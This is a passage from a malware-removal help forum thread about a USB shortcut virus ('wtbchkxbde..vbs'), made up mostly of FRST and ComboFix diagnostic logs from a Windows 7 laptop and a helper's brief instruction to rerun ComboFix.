C:\Windows\ERUNT 2014-04-16 23:07 - 2014-04-16 23:10 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () 
C:\Program Files (x86)\ Malwarebytes Anti-Malware 2014-04-16 23:06 - 2014-04-03 09:51 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-04-16 23:06 - 2014-04-03 09:51 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-04-16 23:06 - 2014-04-03 09:50 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-04-16 02:56 - 2014-04-16 03:44 - 00000000 ____D () C:\Qoobox 2014-04-16 02:56 - 2014-04-16 03:35 - 00000000 ____D () C:\Windows\erdnt 2014-04-16 02:56 - 2011-06-26 08:45 - 00256000 _____ () C:\Windows\PEV.exe 2014-04-16 02:56 - 2010-11-07 19:20 - 00208896 _____ () C:\Windows\MBR.exe 2014-04-16 02:56 - 2009-04-20 06:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00098816 _____ () C:\Windows\sed.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00080412 _____ () C:\Windows\grep.exe 2014-04-16 02:56 - 2000-08-31 02:00 - 00068096 _____ () C:\Windows\zip.exe 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine 2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine 2014-04-16 02:47 - 2014-04-16 02:48 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe 2014-04-14 11:21 - 2008-03-22 04:21 - 733980672 ___SH () C:\Users\Franz\Desktop\The Seeker-The Dark is Rising[2007]DvDrip[Eng]-FXG.avi 2014-04-14 11:19 - 2012-11-07 09:32 - 247528059 ___SH () C:\Users\Franz\Desktop\Amityville Horror 2 The Possession (Full Movie) - YouTube.flv 2014-04-14 11:19 - 2010-01-05 16:04 - 956607690 ___SH () C:\Users\Franz\Desktop\The Marine 2 (2010) DVDR DivXNL-Team.avi 2014-04-14 10:43 - 2014-04-20 05:20 - 
00000000 ____D () C:\FRST 2014-04-14 10:40 - 2014-04-18 23:13 - 02158592 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe 2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe 2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 ____D () C:\[Smad-Cage] 2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files 2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD 2014-04-02 08:42 - 2014-04-16 22:12 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir 2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss 2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE 2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton 2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv 2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv 2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat 2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001 2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games ==================== One Month Modified Files and Folders ======= 2014-04-20 05:21 - 2014-04-20 05:20 - 00015472 _____ () C:\Users\Franz\Desktop\FRST.txt 2014-04-20 05:20 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST 2014-04-20 05:20 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini 2014-04-20 04:51 - 2013-04-16 19:13 - 01757146 _____ () C:\Windows\WindowsUpdate.log 2014-04-20 04:46 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat 2014-04-20 04:46 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat 2014-04-20 04:46 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI 2014-04-20 
04:42 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job 2014-04-20 04:41 - 2009-07-14 06:51 - 00088960 _____ () C:\Windows\setupact.log 2014-04-19 03:21 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc 2014-04-18 23:23 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 2014-04-18 23:23 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 2014-04-18 23:16 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job 2014-04-18 23:15 - 2010-05-11 01:15 - 00114178 _____ () C:\Windows\PFRO.log 2014-04-18 23:15 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT 2014-04-18 23:14 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 2014-04-18 23:13 - 2014-04-18 23:13 - 00000000 ____D () C:\Users\Franz\Desktop\FRST-OlderVersion 2014-04-18 23:13 - 2014-04-14 10:40 - 02158592 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe 2014-04-17 00:00 - 2014-03-11 17:56 - 00000000 ____D () C:\AdwCleaner 2014-04-16 23:59 - 2014-04-16 23:57 - 00000041 _____ () C:\Users\Franz\Desktop\pw.txt 2014-04-16 23:46 - 2014-04-16 23:46 - 00000000 ____D () C:\Windows\ERUNT 2014-04-16 23:10 - 2014-04-16 23:07 - 00119512 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys 2014-04-16 23:06 - 2014-04-16 23:06 - 00001106 _____ () C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\ProgramData\Malwarebytes 2014-04-16 23:06 - 2014-04-16 23:06 - 00000000 ____D () C:\Program Files (x86)\ Malwarebytes Anti-Malware 2014-04-16 22:12 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir 2014-04-16 03:44 - 2014-04-16 02:56 - 00000000 ____D () C:\Qoobox 2014-04-16 03:43 - 2009-07-14 
05:20 - 00000000 __RHD () C:\Users\Default 2014-04-16 03:35 - 2014-04-16 02:56 - 00000000 ____D () C:\Windows\erdnt 2014-04-16 03:15 - 2009-07-14 04:34 - 00000215 _____ () C:\Windows\system.ini 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\ProgramData\Panda Security 2014-04-16 02:52 - 2014-04-16 02:52 - 00000000 ____D () C:\Program Files (x86)\Panda USB Vaccine 2014-04-16 02:50 - 2014-04-16 02:50 - 00003072 _____ () C:\Windows\System32\Tasks\PandaUSBVaccine 2014-04-16 02:48 - 2014-04-16 02:47 - 05194807 ____R (Swearware) C:\Users\Franz\Desktop\ComboFix.exe 2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups 2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD 2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 ____D () C:\[Smad-Cage] 2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files 2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA 2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore 2014-04-03 09:51 - 2014-04-16 23:06 - 00088280 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys 2014-04-03 09:51 - 2014-04-16 23:06 - 00063192 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys 2014-04-03 09:50 - 2014-04-16 23:06 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys 2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE 2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss 2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox 2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox 2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton 2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk 
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos 2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent 2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat 2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 ____D () C:\found.001 2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games 2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache Some content of TEMP: ==================== C:\Users\Franz\AppData\Local\Temp\avgnt.exe C:\Users\Franz\AppData\Local\Temp\Quarantine.exe ==================== Bamital & volsnap Check ================= C:\Windows\System32\winlogon.exe => MD5 is legit C:\Windows\System32\wininit.exe => MD5 is legit C:\Windows\SysWOW64\wininit.exe => MD5 is legit C:\Windows\explorer.exe => MD5 is legit C:\Windows\SysWOW64\explorer.exe => MD5 is legit C:\Windows\System32\svchost.exe => MD5 is legit C:\Windows\SysWOW64\svchost.exe => MD5 is legit C:\Windows\System32\services.exe => MD5 is legit C:\Windows\System32\User32.dll => MD5 is legit C:\Windows\SysWOW64\User32.dll => MD5 is legit C:\Windows\System32\userinit.exe => MD5 is legit C:\Windows\SysWOW64\userinit.exe => MD5 is legit C:\Windows\System32\rpcss.dll => MD5 is legit C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit LastRegBack: 2014-03-24 00:49 ==================== End Of Log ============================ |
20.04.2014, 18:18 | #14 |
/// the machine /// TB-Ausbilder | Flash Drive Shortcut Virus wtbchkxbde..vbs Please delete ComboFix and download it again, run it once more and post the log file.
__________________ Regards, schrauber Proud Member of UNITE and ASAP since 2009 No help via PM! |
21.04.2014, 00:46 | #15 |
| Flash Drive Shortcut Virus wtbchkxbde..vbs ComboFix log file: Code:
ATTFilter ComboFix 14-04-20.01 - Franz 21.04.2014 1:06.2.4 - x64 Microsoft Windows 7 Home Premium 6.1.7600.0.1252.49.1031.18.3764.2038 [GMT 2:00] ausgeführt von:: c:\users\Franz\Desktop\ComboFix.exe AV: Avira Desktop *Disabled/Outdated* {4D041356-F94D-285F-8768-AAE50FA36859} SP: Avira Desktop *Disabled/Outdated* {F665F2B2-DF77-27D1-BDD8-9197742422E4} SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} . . ((((((((((((((((((((((( Dateien erstellt von 2014-03-20 bis 2014-04-20 )))))))))))))))))))))))))))))) . . 2014-04-20 23:20 . 2014-04-20 23:20 -------- d-----w- c:\users\Default\AppData\Local\temp 2014-04-18 21:16 . 2013-09-22 15:47 73266 ----a-w- c:\users\Franz\AppData\Roaming\wtbchkxbde..vbs 2014-04-18 21:14 . 2013-09-22 15:47 73266 ----a-w- c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wtbchkxbde..vbs 2014-04-16 21:46 . 2014-04-16 21:46 -------- d-----w- c:\windows\ERUNT 2014-04-16 21:07 . 2014-04-16 21:10 119512 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys 2014-04-16 21:06 . 2014-04-16 21:06 -------- d-----w- c:\program files (x86)\ Malwarebytes Anti-Malware 2014-04-16 21:06 . 2014-04-16 21:06 -------- d-----w- c:\programdata\Malwarebytes 2014-04-16 21:06 . 2014-04-03 07:51 63192 ----a-w- c:\windows\system32\drivers\mwac.sys 2014-04-16 21:06 . 2014-04-03 07:51 88280 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys 2014-04-16 21:06 . 2014-04-03 07:50 25816 ----a-w- c:\windows\system32\drivers\mbam.sys 2014-04-16 21:06 . 2014-04-16 21:06 -------- d-----w- c:\users\Franz\AppData\Local\Programs 2014-04-16 00:52 . 2014-04-16 00:52 -------- d-----w- c:\programdata\Panda Security 2014-04-16 00:52 . 2014-04-16 00:52 -------- d-----w- c:\program files (x86)\Panda USB Vaccine 2014-04-14 08:43 . 2014-04-20 03:21 -------- d-----w- C:\FRST 2014-04-07 07:32 . 2014-04-09 08:19 -------- d-----w- C:\[Smad-Cage] 2014-04-07 07:30 . 
2014-04-07 07:30 -------- d-----w- c:\programdata\Kaspersky Lab Setup Files 2014-04-02 06:19 . 2014-04-02 06:54 -------- d-----w- c:\users\Franz\AppData\Local\NPE 2014-04-02 06:19 . 2014-04-02 06:19 -------- d-----w- c:\programdata\Norton 2014-03-25 07:40 . 2014-03-25 07:40 -------- d-----w- C:\found.001 . . . (((((((((((((((((((((((((((((((((((( Find3M Bericht )))))))))))))))))))))))))))))))))))))))))))))))))))))) . 2014-03-04 12:17 . 2012-07-17 13:37 22240 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll . . (((((((((((((((((((((((((((( Autostartpunkte der Registrierung )))))))))))))))))))))))))))))))))))))))) . . *Hinweis* leere Einträge & legitime Standardeinträge werden nicht angezeigt. REGEDIT4 . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1] @="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2] @="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3] @="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll . 
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4] @="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 131248 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt.22.dll . [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "NetLimiter"="c:\program files\NetLimiter 3\NLClientApp.exe" [2011-03-21 2910208] "wtbchkxbde"="wscript.exe" [2009-07-14 141824] . [HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] "BackupManagerTray"="c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\BackupManagerTray.exe" [2010-03-08 260608] "StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2010-04-21 98304] "LManager"="c:\program files (x86)\Launch Manager\LManager.exe" [2010-05-26 960080] "APSDaemon"="c:\program files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" [2014-02-12 43848] "avgnt"="c:\program files (x86)\Avira\AntiVir Desktop\avgnt.exe" [2014-02-20 689744] "HP Software Update"="c:\program files (x86)\Hp\HP Software Update\HPWuSchd2.exe" [2011-10-28 49208] "iTunesHelper"="c:\program files (x86)\iTunes\iTunesHelper.exe" [2014-02-21 152392] . c:\users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ wtbchkxbde..vbs [2013-9-22 73266] . c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\ Acer VCM.lnk - c:\program files (x86)\Acer\Acer VCM\AcerVCM.exe [2013-4-16 704032] VR-NetWorld Auftragsprüfung.lnk - c:\program files (x86)\VR-NetWorld\vrtoolcheckorder.exe /autostart [2014-1-9 1137664] . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system] "ConsentPromptBehaviorAdmin"= 0 (0x0) "ConsentPromptBehaviorUser"= 3 (0x3) "EnableLUA"= 0 (0x0) "EnableUIADesktopToggle"= 0 (0x0) "PromptOnSecureDesktop"= 0 (0x0) . 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS] @="" . R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x] R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x] R3 AmUStor;AM USB Stroage Driver;c:\windows\system32\drivers\AmUStor.SYS;c:\windows\SYSNATIVE\drivers\AmUStor.SYS [x] R3 AthBTPort;Atheros Virtual Bluetooth Class;c:\windows\system32\DRIVERS\btath_flt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_flt.sys [x] R3 ATHDFU;Atheros Valkyrie USB BootROM;c:\windows\system32\Drivers\AthDfu.sys;c:\windows\SYSNATIVE\Drivers\AthDfu.sys [x] R3 BTATH_A2DP;Bluetooth A2DP Audio Driver;c:\windows\system32\drivers\btath_a2dp.sys;c:\windows\SYSNATIVE\drivers\btath_a2dp.sys [x] R3 BTATH_HCRP;Bluetooth HCRP Server driver;c:\windows\system32\DRIVERS\btath_hcrp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_hcrp.sys [x] R3 BTATH_LWFLT;Bluetooth LWFLT Device;c:\windows\system32\DRIVERS\btath_lwflt.sys;c:\windows\SYSNATIVE\DRIVERS\btath_lwflt.sys [x] R3 BTATH_RCP;Bluetooth AVRCP Device;c:\windows\system32\DRIVERS\btath_rcp.sys;c:\windows\SYSNATIVE\DRIVERS\btath_rcp.sys [x] R3 BtFilter;BtFilter;c:\windows\system32\DRIVERS\btfilter.sys;c:\windows\SYSNATIVE\DRIVERS\btfilter.sys [x] R3 Netaapl;Apple Mobile Device Ethernet Service;c:\windows\system32\DRIVERS\netaapl64.sys;c:\windows\SYSNATIVE\DRIVERS\netaapl64.sys [x] R3 NLNdisPT;NetLimiter Ndis Protocol Service;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x] R3 ose64;Office 64 Source Engine;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE;c:\program files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [x] R3 WatAdminSvc;Windows-Aktivierungstechnologieservice;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe 
[x] S1 avkmgr;avkmgr;c:\windows\system32\DRIVERS\avkmgr.sys;c:\windows\SYSNATIVE\DRIVERS\avkmgr.sys [x] S1 nltdi;nltdi;c:\program files\NetLimiter 3\nltdi.sys;c:\program files\NetLimiter 3\nltdi.sys [x] S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x] S2 AntiVirSchedulerService;Avira Planer;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe;c:\program files (x86)\Avira\AntiVir Desktop\sched.exe [x] S2 AtherosSvc;AtherosSvc;c:\program files (x86)\Bluetooth Suite\adminservice.exe;c:\program files (x86)\Bluetooth Suite\adminservice.exe [x] S2 DsiWMIService;Dritek WMI Service;c:\program files (x86)\Launch Manager\dsiwmis.exe;c:\program files (x86)\Launch Manager\dsiwmis.exe [x] S2 ePowerSvc;Acer ePower Service;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe;c:\program files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [x] S2 NTI IScheduleSvc;NTI IScheduleSvc;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe;c:\program files (x86)\NewTech Infosystems\Acer Backup Manager\IScheduleSvc.exe [x] S2 RS_Service;Raw Socket Service;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe;c:\program files (x86)\Acer\Acer VCM\RS_Service.exe [x] S2 UNS;Intel(R) Management & Security Application User Notification Service;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe;c:\program files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe [x] S2 Updater Service;Updater Service;c:\program files\Acer\Acer Updater\UpdaterService.exe;c:\program files\Acer\Acer Updater\UpdaterService.exe [x] S3 BTATH_BUS;Atheros Bluetooth Bus;c:\windows\system32\DRIVERS\btath_bus.sys;c:\windows\SYSNATIVE\DRIVERS\btath_bus.sys [x] S3 HECIx64;Intel(R) Management Engine Interface;c:\windows\system32\DRIVERS\HECIx64.sys;c:\windows\SYSNATIVE\DRIVERS\HECIx64.sys [x] S3 
intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdpmd64.sys;c:\windows\SYSNATIVE\DRIVERS\igdpmd64.sys [x] S3 L1C;NDIS Miniport Driver for Atheros AR813x/AR815x PCI-E Ethernet Controller;c:\windows\system32\DRIVERS\L1C62x64.sys;c:\windows\SYSNATIVE\DRIVERS\L1C62x64.sys [x] S3 NLNdisMP;NLNdisMP;c:\windows\system32\DRIVERS\nlndis.sys;c:\windows\SYSNATIVE\DRIVERS\nlndis.sys [x] S3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x] . . --- Andere Dienste/Treiber im Speicher --- . *NewlyCreated* - CDFS . [HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}] 2014-04-02 06:02 1150280 ----a-w- c:\program files (x86)\Google\Chrome\Application\33.0.1750.154\Installer\chrmstp.exe . Inhalt des "geplante Tasks" Ordners . 2014-04-20 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09] . 2014-04-20 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job - c:\program files (x86)\Google\Update\GoogleUpdate.exe [2013-04-16 18:09] . . --------- X64 Entries ----------- . . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1] @="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll . [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2] @="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}" [HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}] 2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll . 
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt4]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2013-09-10 23:54 164016 ----a-w- c:\users\Franz\AppData\Roaming\Dropbox\bin\DropboxExt64.22.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"AmIcoSinglun64"="c:\program files (x86)\AmIcoSingLun\AmIcoSinglun64.exe" [2009-09-22 323584]
"mwlDaemon"="c:\program files (x86)\EgisTec MyWinLocker\x86\mwlDaemon.exe" [BU]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-04-21 166424]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-04-21 391192]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-04-21 413720]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RAVCpl64.exe" [2010-01-20 9996320]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2010-01-20 877600]
"AtherosBtStack"="c:\program files (x86)\Bluetooth Suite\BtvStack.exe" [2010-05-25 585376]
"AthBtTray"="c:\program files (x86)\Bluetooth Suite\AthBtTray.exe" [2010-05-25 354464]
"Apoint"="c:\program files\Apoint2K\Apoint.exe" [2010-03-09 345648]
"Acer ePower Management"="c:\program files\Acer\Acer PowerSmart Manager\ePowerTrayLauncher.exe" [2010-02-02 496160]
"BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2012-11-05 108144]
"wtbchkxbde"="wscript.exe" [2009-07-14 168960]
.
------- Zusätzlicher Suchlauf -------
.
uStart Page = hxxp://www.google.com.ph/intl/en/
uLocal Page = c:\windows\system32\blank.htm
mDefault_Page_URL = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mStart Page = hxxp://homepage.acer.com/rdr.aspx?b=ACAW&l=0407&m=aspire_3820&r=27360413h416l0408z115t6741k596
mLocal Page = c:\windows\SysWOW64\blank.htm
uInternet Settings,ProxyOverride = *.local
IE: An OneNote s&enden - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
IE: Nach Microsoft E&xcel exportieren - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
TCP: DhcpNameServer = 172.20.10.1
.
- - - - Entfernte verwaiste Registrierungseinträge - - - -
.
Toolbar-Locked - (no file)
Wow6432Node-HKLM-Run-<NO NAME> - (no file)
.
.
.
--------------------- Gesperrte Registrierungsschluessel ---------------------
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil10e.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\Windows\\SysWow64\\Macromed\\Flash\\FlashUtil10e.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
